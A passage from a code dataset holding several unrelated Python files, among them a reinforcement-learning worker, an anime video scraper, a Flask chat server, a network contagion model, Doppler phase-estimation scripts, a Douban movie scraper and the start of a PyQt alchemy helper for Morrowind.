gamma)[:-1]\n self.value_plus = np.asarray(values.tolist() + [bootstrap_value])\n advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]\n advantages = discount(advantages, gamma)\n\n # Update the global network using gradients from loss\n # Generate network statistics to periodically save\n feed_dict = {self.local_network.target_v: discounted_rewards,\n self.local_network.state_input: observations,\n self.local_network.actions: actions,\n self.local_network.advantages: advantages,\n self.local_network.state_in[0]: self.batch_rnn_state[0],\n self.local_network.state_in[1]: self.batch_rnn_state[1]}\n v_l, p_l, e_l, g_n, v_n, self.batch_rnn_state, _ = sess.run([self.local_network.value_loss,\n self.local_network.policy_loss,\n self.local_network.entropy,\n self.local_network.grad_norms,\n self.local_network.var_norms,\n self.local_network.state_out,\n self.local_network.apply_grads],\n feed_dict=feed_dict)\n return v_l / len(rollout), p_l / len(rollout), e_l / len(rollout), g_n, v_n\n\n def work(self, max_steps, max_steps_per_episode, max_episodes, gamma, sess, coord, saver):\n try:\n episodes = sess.run(self.global_episodes)\n total_steps = 0\n print(\"Starting worker \" + str(self.number))\n with sess.as_default(), sess.graph.as_default():\n while not coord.should_stop():\n if episodes >= max_episodes:\n break\n\n sess.run(self.update_local_ops)\n episode_buffer = []\n episode_values = []\n # episode_frames = []\n episode_reward = 0\n steps_per_episode = 0\n\n state_t = self.env.reset()\n # s = self.env.get_state().screen_buffer\n # episode_frames.append(s)\n # s = process_frame(s)\n rnn_state = self.local_network.state_init\n self.batch_rnn_state = rnn_state\n while steps_per_episode < max_steps_per_episode:\n # Take an action using probabilities from policy network output.\n actor_policy, critic_value, rnn_state = sess.run(\n [self.local_network.policy, self.local_network.value, self.local_network.state_out],\n feed_dict={self.local_network.state_input: [state_t],\n self.local_network.state_in[0]: rnn_state[0],\n self.local_network.state_in[1]: rnn_state[1]})\n\n if np.random.random() < 0.2:\n a = np.random.randint(0, 5)\n else:\n a = np.argmax(actor_policy[0])\n\n state_t1, reward, done = self.env.step(a)\n 
print(\"%s, Step=%d, Action=%d\" % (self.name, steps_per_episode, a))\n # if done == False:\n # episode_frames.append(s1)\n # s1 = process_frame(s1)\n # else:\n # s1 = s\n\n episode_buffer.append([state_t, a, reward, state_t1, done, critic_value[0, 0]])\n episode_values.append(critic_value[0, 0])\n\n episode_reward += reward\n state_t = state_t1\n total_steps += 1\n steps_per_episode += 1\n\n # If the episode hasn't ended, but the experience buffer is full, then we\n # make an update step using that experience rollout.\n if len(episode_buffer) == 30 and done == False and steps_per_episode != max_steps_per_episode - 1:\n # Since we don't know what the true final return is, we \"bootstrap\" from our current\n # value estimation.\n v1 = sess.run(self.local_network.value,\n feed_dict={self.local_network.state_input: [state_t],\n self.local_network.state_in[0]: rnn_state[0],\n self.local_network.state_in[1]: rnn_state[1]})[0, 0]\n v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, v1)\n episode_buffer = []\n sess.run(self.update_local_ops)\n if done == True:\n break\n\n self.episode_rewards.append(episode_reward)\n self.episode_lengths.append(steps_per_episode)\n self.episode_mean_values.append(np.mean(episode_values))\n\n # Update the network using the episode buffer at the end of the episode.\n if len(episode_buffer) > 0:\n v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, 0.0)\n\n # # Periodically save gifs of episodes, model parameters, and summary statistics.\n # if episode_count % 5 == 0 and episode_count != 0:\n # if self.name == 'worker_0' and episode_count % 25 == 0:\n # time_per_step = 0.05\n # images = np.array(episode_frames)\n # make_gif(images, './frames/image' + str(episode_count) + '.gif',\n # duration=len(images) * time_per_step, true_image=True, salience=False)\n # if episode_count % 250 == 0 and self.name == 'worker_0':\n # saver.save(sess, self.model_path + '/model-' + str(episode_count) + '.cptk')\n # print(\"Saved Model\")\n #\n # mean_reward = np.mean(self.episode_rewards[-5:])\n # mean_length = np.mean(self.episode_lengths[-5:])\n # mean_value = np.mean(self.episode_mean_values[-5:])\n # summary = tf.Summary()\n # summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))\n # summary.value.add(tag='Perf/Length', simple_value=float(mean_length))\n # summary.value.add(tag='Perf/Value', simple_value=float(mean_value))\n # summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))\n # summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))\n # summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))\n # summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))\n # summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))\n # self.summary_writer.add_summary(summary, episode_count)\n #\n # self.summary_writer.flush()\n\n if self.name == 'worker_0':\n sess.run(self.increment)\n\n episodes += 1\n finally:\n self.env.end()","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52854136","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\nimport time\nimport os\nimport concurrent.futures\nimport json\nfrom urllib.parse import unquote\n\n\nmainURL = \"https://anime1.me/category/2020%e5%b9%b4%e5%86%ac%e5%ad%a3/%e9%ad%94%e6%b3%95%e7%b4%80%e9%8c%84-%e9%ad%94%e6%b3%95%e5%b0%91%e5%a5%b3%e5%b0%8f%e5%9c%93%e5%a4%96%e5%82%b3\"\napiURL = 
\"https://v.anime1.me/api\"\n\nheaders = {\n \"Referer\": '',\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.47\",\n \"Origin\": \"https://v.anime1.me\"\n}\n\n\nvideoHeader = {\n \"Referer\": 'https://v.anime1.me/',\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.47\",\n \"Cookie\": \"\"\n}\n\n\nforms = {\n \"d\": \"\"\n}\n\n\ndef thread(session, middleURL):\n videoTitle = \"\"\n ss = session.post(middleURL)\n videoSoup = BeautifulSoup(ss.content, \"lxml\")\n mainScript = videoSoup.findAll(\"script\")[-1].string\n\n str = mainScript.split(\n \"p.setup({\")[-1].split(\"});\")[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n\n while True:\n arr = str.split(\":\", 1)\n val = arr[-1].split(\",\", 1)\n\n if arr[0] == \"title\":\n videoTitle = val[0].replace(\"\\\"\", \"\").replace(\"\\'\", \"\")\n break\n str = val[-1]\n\n d = unquote(mainScript.split(\n \"x.send('d=\")[-1].split(\"');\")[0].replace(\"\\n\", \"\").replace(\" \", \"\"))\n\n forms[\"d\"] = d\n headers[\"Referer\"] = middleURL\n\n try:\n with requests.Session() as newSession:\n getVideoURL = newSession.post(apiURL, data=forms, headers=headers)\n videoHeader[\"Cookie\"] = json.dumps(getVideoURL.cookies.get_dict()).split(\n \"{\", 1)[-1].split(\"}\", 1)[0].replace(\"\\\"\", \"\").replace(\" \", \"\").replace(\",\", \"; \").replace(\":\", \"=\")\n urlObj = json.loads(getVideoURL.content)\n time.sleep(10)\n videoContent = newSession.get(\n \"https:\"+urlObj['l'], headers=videoHeader)\n\n if videoContent.status_code == 200:\n print(videoTitle, \" 成功\")\n with open(\"./videos/\"+videoTitle+\".mp4\", 'wb') as f:\n f.write(videoContent.content)\n f.close()\n\n print(\"the header is \", videoHeader)\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\")\n else:\n print(\"FAILED!!!!!!!\")\n print(\"the title is \", videoTitle)\n print(\"the header is \", videoHeader)\n print(\"the url is \", \"https:\"+urlObj['l'])\n print(\"the code is \", videoContent)\n print(\"\\n\\n\\n\\n\")\n\n except Exception as e:\n print(e)\n\n\ndef pool(session, middleURLs):\n with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:\n all_task = [executor.submit(thread, session, middleURL)\n for middleURL in middleURLs]\n wait(all_task, return_when=ALL_COMPLETED)\n\n\ndef scraper():\n with requests.Session() as s:\n res = s.get(mainURL)\n soup = BeautifulSoup(res.content, \"lxml\")\n iframes = soup.findAll(\"iframe\", {\"class\": \"vframe\"})\n middleURLs = list(map(lambda iframe: iframe[\"src\"], iframes))\n # if 上一頁的話就要在往下找\n\n pool(session=s, middleURLs=middleURLs)\n\n\ndef cls(): return os.system('cls')\n\n\ndef main():\n # cls()\n scraper()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"147894972","text":"import random\r\ncomputer = random.randint(0, 2)\r\nplayer = int(input(\"请输入【石头(0)、剪刀(1)、布(2)】:\"))\r\nif 0 <= player <= 2:\r\n if (((player == 0) and (computer == 1)) or\r\n ((player == 1) and (computer == 2)) or\r\n ((player == 2) and (computer == 0))):\r\n print(\"玩家获胜,恭喜!\")\r\n elif player == computer:\r\n print(\"平手!\")\r\n else:\r\n print(\"玩家输了,再接再厉!\")\r\nelse:\r\n 
print(\"输入错误\")\r\n","sub_path":"Python/if-else和if-elif-else.py","file_name":"if-else和if-elif-else.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"400607948","text":"#!/usr/bin/env python\n'''\ntests.controller.test_platform_controller\n\nTest for the platform controller\n'''\nimport json\nfrom ooiservices.app import app\nfrom tests.services_test_case import ServicesTestCase\n\nclass TestPlatformController(ServicesTestCase):\n def setUp(self):\n '''\n Initializes the application\n '''\n ServicesTestCase.setUp(self)\n app.config['TESTING'] = True\n self.app = app.test_client()\n \n def test_platform_listing(self):\n '''\n Test that the app context initializes successfully\n '''\n rv = self.app.get('/platforms')\n json.loads(rv.data) # Assert data is JSON\n with open('tests/controller/expected_platforms.json', 'r') as f:\n expected = f.read()\n\n assert expected == rv.data\n\n","sub_path":"tests/controller/test_platform_controller.py","file_name":"test_platform_controller.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"522187664","text":"import random\nimport math\nfrom enum import Enum\nimport networkx as nx\n\nfrom mesa import Agent, Model\nfrom mesa.time import RandomActivation\nfrom mesa.datacollection import DataCollector\nfrom mesa.space import NetworkGrid\n\nclass State(Enum):\n SUSCEPTIBLE, INACTIVE, ACTIVE, REMOVED = range(4)\n\ndef number_state(model, state):\n return sum([1 for a in model.grid.get_all_cell_contents() if a.state is state])\n\ndef number_susceptible(model):\n return number_state(model, State.SUSCEPTIBLE)\n\ndef number_inactive(model):\n return number_state(model, State.INACTIVE)\n\ndef number_active(model):\n return number_state(model, State.ACTIVE)\n\ndef number_removed(model):\n return number_state(model, State.REMOVED)\n\n# def infective_clustering(model):\n# infective=0\n# G=model.G\n# for v in G.nodes:\n# x=model.grid.get_cell_list_contents(v)\n# if x.state == State.ACTIVE:\n# neighbors=model.grid.get_cell_list_contents(G.neighbors(v))\n# for u in neighbors:\n# if u.state == State.ACTIVE:\n# infective+=1\n# return infective\n\n\nclass VirusModel(Model):\n\n def __init__(self, num_nodes, avg_node_degree, prob_rewire, initial_outbreak_size, alpha, beta, gamma, k, n):\n\n self.num_nodes = num_nodes\n self.avg_node_degree = avg_node_degree\n self.prob_rewire=prob_rewire\n self.G = nx.watts_strogatz_graph(n=self.num_nodes,k=avg_node_degree,p=prob_rewire)\n # self.G = nx.erdos_renyi_graph(n=self.num_nodes, p=prob)\n self.grid = NetworkGrid(self.G)\n self.schedule = RandomActivation(self)\n self.initial_outbreak_size = initial_outbreak_size if initial_outbreak_size <= num_nodes else num_nodes\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n self.k=k\n self.n=n\n\n # Create agents\n for i, node in enumerate(self.G.nodes()):\n a = VirusAgent(i, self, State.SUSCEPTIBLE, self.alpha, self.beta, self.gamma, self.k, self.n)\n self.schedule.add(a)\n # Add the agent to the node\n self.grid.place_agent(a, node)\n\n # Infect some nodes\n active_nodes = random.sample(self.G.nodes(), self.initial_outbreak_size)\n for a in self.grid.get_cell_list_contents(active_nodes):\n a.state = State.ACTIVE\n\n self.datacollector = DataCollector(\n model_reporters={\n \"Infected\": number_active,\n \"Susceptible\": number_susceptible,\n \"Carrier\": number_inactive,\n \"Removed\": 
number_removed\n # \"Active Clustering\": infective_clustering,\n }\n )\n\n self.running = True\n self.datacollector.collect(self)\n\n def removed_susceptible_ratio(self):\n try:\n return number_state(self, State.REMOVED) / number_state(self, State.SUSCEPTIBLE)\n except ZeroDivisionError:\n return math.inf\n\n def step(self):\n self.schedule.step()\n self.datacollector.collect(self)\n\n def run_model(self, n):\n for i in range(n):\n self.step()\n\n\nclass VirusAgent(Agent):\n def __init__(self, unique_id, model, initial_state, alpha, beta, gamma, k, n):\n super().__init__(unique_id, model)\n\n self.state = initial_state\n\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n self.k = k\n self.n = n\n\n def try_to_infect_neighbors(self):\n neighbors_nodes = self.model.grid.get_neighbors(self.pos, include_center=False)\n susceptible_neighbors = [agent for agent in self.model.grid.get_cell_list_contents(neighbors_nodes) if\n agent.state is State.SUSCEPTIBLE]\n for a in susceptible_neighbors:\n if random.random() < self.beta:\n a.state = State.INACTIVE\n\n def try_become_active(self):\n neighbors_nodes = self.model.grid.get_neighbors(self.pos, include_center=False)\n active_neighbors = [agent for agent in self.model.grid.get_cell_list_contents(neighbors_nodes) if\n agent.state is State.ACTIVE]\n num_active_neighbors=len(active_neighbors)\n # prop_active_neighbors = active_neighbors/neighbors_nodes\n x=random.random()\n y = (-((self.k**(-self.n))*(x-1))/x)**(-1/self.n)\n if y < num_active_neighbors:\n self.state = State.ACTIVE\n\n def try_gain_resistance(self):\n if random.random() < self.alpha:\n self.state = State.REMOVED\n\n def step(self):\n if self.state is State.ACTIVE:\n self.try_to_infect_neighbors()\n self.try_gain_resistance()\n # self.try_become_inactive()\n elif self.state is State.INACTIVE:\n self.try_become_active()","sub_path":"Code/revolution-abms/revolution-on-network-ws/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"77055948","text":"import numpy as np\nimport sys\nimport os\nfrom matplotlib import pyplot as plt\nimport pickle\nfrom swellex.audio.config import get_proj_tones\nfrom swellex.audio.lse import get_doppler_est_pickle_name, AlphaEst\nfrom scipy.interpolate import interp1d\n\n'''\nDescription:\nRoutines to look at the phase estimates\nfor the various projects\n\nDate: \n10/21\n\nAuthor: Hunter Akins\n\nInstitution: UC San Diego, Scripps Institution of Oceanography\n\n'''\n\n\ndef get_local_pickle_dir(proj_str):\n proj_root = 'pickles/' + proj_str + '/'\n return proj_root\n\ndef copy_pests(proj_str):\n freqs = get_proj_tones(proj_str)\n for freq in freqs:\n pickle_loc = get_doppler_est_pickle_name(freq, proj_string=proj_str)\n ssh_root = 'fakins@tscc-login.sdsc.edu:'\n local_spot = get_local_pickle_dir(proj_str)\n os.system('scp ' + ssh_root + pickle_loc + ' ' + local_spot)\n\ndef get_local_name(freq, proj_str):\n pickle_loc = get_doppler_est_pickle_name(freq, proj_string=proj_str)\n i = len(pickle_loc)-1\n while pickle_loc[i] != '/':\n i -= 1\n i += 1\n pname = pickle_loc[i:]\n pdir = get_local_pickle_dir(proj_str)\n return pdir + pname\n \ndef load_pest(freq, proj_str, chunk_len=1024, var=0.1):\n name = get_local_name(freq, proj_str)\n with open(name, 'rb') as f:\n alpha_est = pickle.load(f) \n freqs = np.array(alpha_est.freqs)\n freqs = freqs.reshape(freqs.size)\n num_samps = freqs.size\n t_grid = np.linspace(chunk_len/1500* 
0.5, chunk_len/1500 * (num_samps-1) + chunk_len / 1500*0.5,num_samps) \n return t_grid, freqs\n\ndef get_full_freqs(proj_str):\n #tmax = 10*60\n freqs = get_proj_tones(proj_str)\n freqs = [x for x in freqs if x != 388 and x != 166]\n first = True\n for count, f in enumerate(freqs):\n t_grid, f_ests = load_pest(f, proj_str)\n tmax = t_grid[-1]\n if first == True:\n i = 0 \n while t_grid[i] < tmax:\n i += 1\n first = False\n full_freqs = np.zeros((len(freqs), i-1))\n #krs = np.load('../audio/npy_files/' + str(f) + '_krs.npy')\n #kbar = np.mean(krs.real)\n v_est = (f - f_ests)*1500 / f\n full_freqs[count, :] = v_est[1:i]\n\n return t_grid[1:i], full_freqs\n\ndef proc_second():\n c = 1500\n freqs = get_proj_tones('s5_deep_second')\n first = True\n for count, f in enumerate(freqs):\n t_grid, f_ests = load_pest(f, proj_str)\n if first == True:\n full_freqs = np.zeros((len(freqs), t_grid.size))\n first=False\n v_est = (f_ests/f - 1)*c\n full_freqs[count, :] = v_est[:]\n return t_grid, full_freqs\n\ndef make_theta_plots(tgrid, full_vest, freq, proj_str, c=1500):\n \"\"\"\n Look at variability in phase correction\n as function of source frequency phase used \n \"\"\"\n mean_v = np.mean(full_vest, axis=1)\n dev_v = full_vest - mean_v.reshape(mean_v.size, 1)\n dev_f = freq*dev_v/c\n dt = 1024/1500\n theta = np.cumsum(dev_f,axis=1)*2*np.pi*dt\n print(theta.shape)\n fig, axes = plt.subplots(2,1)\n plt.suptitle('Excess phase accumulated due to accelerations for experiment ' + proj_str + ' estimated using the phase from each frequency band in the experiment')\n for i in range(theta.shape[0]):\n axes[0].plot(tgrid/60, theta[i,:] / 2 /np.pi)\n axes[1].plot(tgrid/60, dev_f[i,:])\n axes[1].set_xlabel('Time (min)')\n axes[0].set_ylabel('Excess phase (cycles)')\n axes[1].set_ylabel('Frequency deviation from mean (Hz)')\n\ndef make_range_err(tgrid, full_vest, freq, proj_str, c=1500):\n \"\"\"\n Look at variability in phase correction\n as function of source frequency phase used \n \"\"\"\n mean_v = np.mean(full_vest, axis=1)\n dev_v = full_vest - mean_v.reshape(mean_v.size, 1)\n dt = tgrid[1]-tgrid[0]\n dev_r = np.cumsum(dev_v, axis=1)*dt\n fig = plt.figure()\n plt.suptitle('Range error in assuming a constant velocity')\n for i in range(dev_r.shape[0]):\n plt.plot(tgrid/60, dev_r[i,:])\n plt.ylabel('Excess range (m)')\n\n\n\"\"\"\nproj_str = 's5_deep'\n#copy_pests(proj_str)\nt3, vv3 = get_full_freqs(proj_str)\nplt.plot(t3, vv3[-1,:])\nplt.show()\n\nproj_str = 's5_deep_second'\n#copy_pests(proj_str)\nt, vvf= proc_second()\nplt.figure()\ni = 0\nfor f in get_proj_tones(proj_str):\n if f == 388:\n plt.plot(t[400:-1], vvf[i,400:-1])\n i += 1\nplt.show()\nprint(t[0])\nprint('mean v', np.mean(vvf[:, 400:], axis=1))\nprint('start time', 60*60 + t[400])\nprint('start time min', 60 + t[400]/60)\n\nr = np.cumsum(vvf[-1, 400:-1])\nplt.plot(r)\nplt.show()\n\"\"\"\n\ndef make_single_vel_s5():\n proj_str = 's5_deep_cpa'\n #copy_pests(proj_str)\n t3, vv3 = get_full_freqs(proj_str)\n print('dt1', t3[1]-t3[0])\n t3 += 50*60\n plt.figure()\n proj_str = 's5_deep'\n t1, vv1 = get_full_freqs(proj_str)\n plt.plot(t1/60, vv1[-1,:])\n proj_str = 's5_deep_second'\n #copy_pests(proj_str)\n t2, vv2 = get_full_freqs(proj_str)\n t2 += 64*60\n plt.plot(t2/60, vv2[-1,:])\n t3_inds = [i for i in range(len(t3)) if t3[i] > np.max(t1) and t3[i] < np.min(t2)]\n t3 = t3[t3_inds]\n vv3 = vv3[:,t3_inds]\n plt.plot(t3/60, vv3[-1,:])\n #plt.show()\n\n dt = 4096/1500\n full_grid = list(t1) + list(t3) + list(t2)\n full_grid = np.array(full_grid)\n 
full_vals = list(vv1[-1,:]) + list(vv3[-1, :]) + list(vv2[-1,:])\n full_vals = np.array(full_vals)\n plt.figure()\n plt.plot(full_grid, full_vals)\n #plt.show()\n desired_grid = np.arange(0+dt/2, np.max(t2), dt)\n interp_f = interp1d(full_grid, full_vals)\n desired_vals = interp_f(desired_grid)\n plt.figure()\n plt.plot(desired_grid/60, desired_vals)\n plt.show()\n thing = np.zeros((2, desired_vals.size))\n thing[0,:] = desired_grid\n thing[1,:] = desired_vals\n np.save('s5_deep_v.npy', thing)\n\n r_vals =np.cumsum(desired_vals)\n plt.figure()\n plt.plot(r_vals)\n plt.show()\n\n #\n\nmake_single_vel_s5()\n","sub_path":"ship/proc_pests.py","file_name":"proc_pests.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"440774407","text":"from flask import Flask, request, abort\r\nimport time\r\nimport datetime\r\nimport json\r\nimport bots\r\n\r\napp = Flask(__name__)\r\n\r\nall_messages = [\r\n {\r\n 'login': 'login',\r\n 'text': 'text',\r\n 'time': time.time()\r\n }\r\n]\r\n\r\n\r\n@app.route(\"/\")\r\ndef server_info():\r\n return \"Server info\"\r\n\r\n\r\n@app.route(\"/status\")\r\ndef status():\r\n names = []\r\n for message in all_messages:\r\n if message['login'] not in names:\r\n names.append(message['login'])\r\n status = {\r\n \"status\": \"true\",\r\n \"name\": \"messanger\",\r\n \"number of members\": len(names),\r\n \"number of messages\": len(all_messages),\r\n \"time\": str(datetime.datetime.fromtimestamp(time.time()).strftime(\"%Y-%m-%d-%H.%M.%S\"))\r\n }\r\n return json.dumps(status)\r\n\r\n\r\n@app.route(\"/send\", methods=['POST'])\r\ndef send_message():\r\n data = request.json\r\n if not isinstance(data, dict):\r\n return abort(400)\r\n if 'login' not in data or 'text' not in data:\r\n return abort(400)\r\n\r\n login = data['login']\r\n text = data['text']\r\n\r\n if not isinstance(login, str) or not isinstance(text, str):\r\n return abort(400)\r\n if not (0 < len(login) < 30):\r\n return abort(400)\r\n if not (0 < len(text) < 100):\r\n return abort(400)\r\n\r\n message = {\r\n 'login': login,\r\n 'text': text,\r\n 'time': time.time()\r\n }\r\n all_messages.append(message)\r\n names = []\r\n for message in all_messages:\r\n if message['login'] not in names:\r\n names.append(message['login'])\r\n server_status = []\r\n server_status.append(len(names))\r\n server_status.append(len(all_messages))\r\n x = bots.check_on_commands(text, login, server_status)\r\n if x != None:\r\n all_messages.append(x)\r\n\r\n return {'ok': True}\r\n\r\n\r\n@app.route(\"/get\")\r\ndef get_messages():\r\n try:\r\n klient_time = float(request.args['after'])\r\n except:\r\n return abort(400)\r\n\r\n return_messages = []\r\n for message in all_messages:\r\n if message['time'] > klient_time:\r\n return_messages.append(message)\r\n return {\"return_messages\": return_messages[:50]}\r\n\r\n\r\napp.run()\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"497314488","text":"import requests\nimport csv\nimport json\nfrom requests.adapters import HTTPAdapter\n\n# def getinfo():\n# # r=requests.get(\"https://douban-api.uieee.com/v2/movie/subject/1764796\")\n# # info=r.text.encode('utf-8').decode('unicode_escape')\n# # file=open(\"info.txt\",\"w\")\n# # file.write(info)\n# # file.close()\n# def makedir():\n# file=open(\"info.txt\",\"r\")\n# str=file.read()\n# 
dict=json.dumps(str)\n# print(dict)\n#\n# makedir()\ns = requests.Session()\ns.mount('http://', HTTPAdapter(max_retries=3))\ns.mount('https://', HTTPAdapter(max_retries=3))\n\nlistone=[\"id\",\"year\",\"title\",\"reviews_count\",\"wish_count\",\"collect_count\"]\nother=[\"castsid\",\"castsname\",\"directorsid\",\"directorsname\",\"writersid\",\"writersname\"]\nlistlist=[\"tags\",\"pubdates\",\"languages\",\"durations\",\"genres\",\"countries\",\"summary\",\"aka\"]\nspecial=[\"casts\",\"directors\",\"writers\"]\n\nlistact=[\"id\",\"name\",\"name_en\",\"gender\",\"professions\",\"summary\",\"birthday\",\"born_place\"]\ndef writefile(path,num):\n try:\n r=requests.get(path+num)\n except:\n return None\n info=r.text\n dict1=json.loads(info)\n print(\"访问id:\"+num)\n return dict1\n # file=open(\"%d.txt\"%num,\"w\")\n # file.write(str(dict1))\n # file.close()\n\n\ndef readfile(path):\n file=open(path,\"r\")\n info=file.read()\n dict=eval(info)\n return dict\n\nListMovie=listone+listlist\ndef findwhatyouneed(dict):\n idlist = []\n with open(\"movie.csv\", \"a\") as csvfile:\n writer = csv.DictWriter(csvfile,ListMovie+other)\n tempdict={}\n for i in ListMovie:\n tempdict[i]=str(dict[i])\n for i in special:\n namelist=[]\n for j in dict[i]:\n idlist.append(j[\"id\"])\n namelist.append(j[\"name\"])\n tempdict[i+\"id\"]=idlist\n tempdict[i+\"name\"]=namelist\n writer.writerow(tempdict)\n print(\"存储%s信息成功\"%tempdict[\"id\"])\n print(\"查询%s电影的电影人\"%tempdict[\"id\"])\n with open(\"act.csv\", \"a\") as csvfile:\n writer = csv.DictWriter(csvfile,listact)\n actdict={}\n for i in idlist:\n if i==None:\n continue\n print(\"读取id:%s的电影人信息\"%i)\n dictt=writefile(\"https://douban-api.uieee.com/v2/movie/celebrity/\",i)\n if dictt==None:\n continue\n for j in listact:\n actdict[j]=str(dictt[j])\n writer.writerow(actdict)\n\n\ndef getid():\n numlist=[]\n pa={\"count\":\"150\",\"start\": \"0\"}\n print(\"查询近期上映电影\")\n r=requests.get(\"https://douban-api.uieee.com/v2/movie/coming_soon\",params=pa)\n print(\"查询成功\")\n dict=r.json()\n for i in dict[\"subjects\"]:\n print(\"电影id是\"+i[\"id\"])\n numlist.append(i[\"id\"])\n return numlist\n\n\n\nif __name__==\"__main__\":\n with open(\"movie.csv\", \"w\") as csvfile:\n writer = csv.DictWriter(csvfile,ListMovie+other)\n writer.writeheader()\n with open(\"act.csv\", \"w\") as csvfile:\n writer = csv.DictWriter(csvfile,listact)\n writer.writeheader()\n num=getid()\n for i in num:\n try:\n findwhatyouneed(writefile(\"https://douban-api.uieee.com/v2/movie/subject/\",i))\n except:\n continue","sub_path":"douban_API_csv.py","file_name":"douban_API_csv.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"29160623","text":"\"\"\"\nRun the benchmark test cases using pytest-benchmark\n\"\"\"\nimport pytest\nfrom epics import PV\n\nimport typhos.benchmark.utils as utils\nfrom typhos.benchmark.cases import unit_tests\nfrom typhos.benchmark.profile import profiler_context\n\nfrom .conftest import save_image\n\n\n# Name the test cases using the keys, run using the values\n@pytest.mark.parametrize('unit_test_name', unit_tests.keys())\ndef test_benchmark(unit_test_name, qapp, qtbot, benchmark, monkeypatch):\n \"\"\"\n Run all registered benchmarks.\n\n These typically just open and close a particular typhos screen.\n \"\"\"\n # Crudely permenant patch here to get around cleanup bug\n PV.count = property(lambda self: 1)\n suite = benchmark(inner_benchmark, unit_tests[unit_test_name], qtbot)\n 
save_image(suite, 'test_benchmark_' + unit_test_name)\n\n\ndef inner_benchmark(unit_test, qtbot):\n suite, context = unit_test()\n with context:\n qtbot.add_widget(suite)\n qtbot.wait_active(suite)\n return suite\n\n\ndef test_profiler(capsys):\n \"\"\"Super basic test that hits most functions here\"\"\"\n with profiler_context(['typhos.benchmark.utils']):\n utils.get_native_functions(utils)\n output = capsys.readouterr()\n assert 'get_native_functions' in output.out\n","sub_path":"typhos/tests/test_benchmark.py","file_name":"test_benchmark.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"152635912","text":"import func\nimport sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\n__author__ = \"twsau-soft.co.uk\"\n\n# global functions\ndef toggleNegative():\n\tfunc.toggleIncludeNegative()\n\t# reload frames\n\ndef toggleBloodmoon():\n\tfunc.toggleIncludeBloodmoon()\n\t# reload frames\n\ndef toggleTribunal():\n\tfunc.toggleIncludeTribunal()\n\t# reload frames\n\ndef selectEffect(item):\n\tif type(item) != str:\n\t\titem = item.text()\n\tselectedEffectTitle.setText(item)\n\trecipeList.load(item);\n\tloadEffectIcon(item)\n\tloadEffectInfo(item)\n\ndef loadEffectIcon(selectedEffect):\n\tfor effect in func.loadEffects():\n\t\tif effect[\"name\"] == selectedEffect:\n\t\t\tpixmap = QPixmap(effect[\"filename\"])\n\t\t\teffectIcon.setPixmap(pixmap)\n\ndef loadEffectInfo(selectedEffect):\n\tfor effect in func.loadEffects():\n\t\tif effect[\"name\"] == selectedEffect:\n\t\t\teffectInfo.setText(effect[\"info\"])\n\ndef selectIngredients(item):\n\tif type(item) != str:\n\t\titem = item.text()\n\n\nclass Window(QMainWindow):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.setFixedSize(600, 396)\n\t\tself.setWindowTitle(\"Asliel | Morrowind Alchemy Helper | twsau.co.uk\")\n\t\tself.setWindowIcon(QIcon(\"./icons/effects/Blind.jpg\"))\n\t\tself.setStyleSheet(open(\"./qss/style.qss\", \"r\").read())\n\n\t\t# menu actions\n\t\tquitAction = QAction(\"&Quit\", self)\n\t\tquitAction.triggered.connect(sys.exit)\n\t\ttoggleNegativeAction = QAction(\"&Negative Effects\", self, checkable=True)\n\t\ttoggleNegativeAction.triggered.connect(toggleNegative)\n\t\ttoggleBloodmoonAction = QAction(\"&Bloodmoon\", self, checkable=True, checked=True)\n\t\ttoggleBloodmoonAction.triggered.connect(toggleBloodmoon)\n\t\ttoggleTribunalAction = QAction(\"&Tribunal\", self, checkable=True, checked=True)\n\t\ttoggleTribunalAction.triggered.connect(toggleTribunal)\n\n\t\t# main menu\n\t\tmainMenu = self.menuBar()\n\t\tfileMenu = 